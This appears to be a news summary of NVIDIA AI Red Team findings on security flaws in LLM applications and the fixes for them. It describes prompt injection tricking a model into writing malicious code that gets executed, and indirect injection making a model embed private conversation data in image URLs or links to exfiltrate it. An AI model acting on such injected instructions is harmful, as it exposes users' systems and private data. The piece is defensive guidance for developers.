HyperAIHyperAI
Back to Headlines

NVIDIA AI Red Team Reveals Critical LLM Security Risks and Practical Fixes for Developers

10 days ago

The NVIDIA AI Red Team (AIRT) has spent years evaluating AI-powered systems for security flaws before they go live. Their findings reveal recurring vulnerabilities in large language model (LLM) applications that, if ignored, can lead to serious breaches. Below are three critical security issues and practical steps to address them. First, executing LLM-generated code poses a severe risk of remote code execution (RCE). Developers sometimes use unsafe functions like exec or eval to run dynamic code, such as SQL queries or data analysis scripts. However, attackers can exploit prompt injection—either directly or through obfuscation—to trick the model into generating malicious code. If that output is executed without isolation, attackers can gain full control over the system. Even complex guardrails can be bypassed through layered evasion techniques. The best defense is to avoid exec and eval entirely. Instead, interpret the LLM’s output to extract intent and map it to a predefined set of safe operations. If dynamic execution is unavoidable, run it in a secure, isolated sandbox—such as one built with WebAssembly—to prevent system compromise. Second, insecure access control in retrieval-augmented generation (RAG) systems is a major concern. RAG allows models to pull in up-to-date external data without retraining, but it introduces risks. One common flaw is improper user-level access control. Sensitive documents may be accessible to users who shouldn’t see them, often because permissions weren’t set correctly in the original source—like Confluence or Google Workspace—or because the RAG system uses a single over-permissioned token to fetch data. Delays in syncing permission changes can also leave data exposed. To fix this, ensure that access controls are consistently enforced at both the source and the RAG layer. Use fine-grained access policies and avoid broad read access. For example, in email-based RAG systems, allow users to select only their own emails, or limit access to internal documents only. Additionally, establish authoritative data sources for sensitive topics—like HR information—and restrict access to them tightly. Implement guardrails to validate that retrieved content is relevant and safe before it’s used in the prompt. Third, rendering active content like Markdown, HTML, or hyperlinks in LLM outputs can lead to data exfiltration. Attackers can embed malicious links or images that trigger network requests to their servers when viewed. For instance, an image URL can include encoded user data in its query string, which gets logged on the attacker’s server. This is especially dangerous when combined with indirect prompt injection, where the LLM is tricked into including private conversation history in a link. To prevent this, apply strict content security policies that only allow images from trusted domains. For links, show the full URL to users before they click, or disable automatic navigation so users must copy and paste the address. Sanitize all LLM output to strip out URLs, markdown, and HTML. As a final measure, disable active content rendering in the UI entirely if security is paramount. In summary, the most critical risks in LLM applications are executing unsafe code, weak access control in RAG systems, and rendering active content. Addressing these early in development can prevent serious security incidents. By adopting safe coding practices, enforcing strict access policies, and sanitizing outputs, developers can significantly strengthen their AI systems. For deeper insight into adversarial AI, consider the NVIDIA DLI course on Exploring Adversarial Machine Learning, and explore additional technical resources on AI security from NVIDIA.

Related Links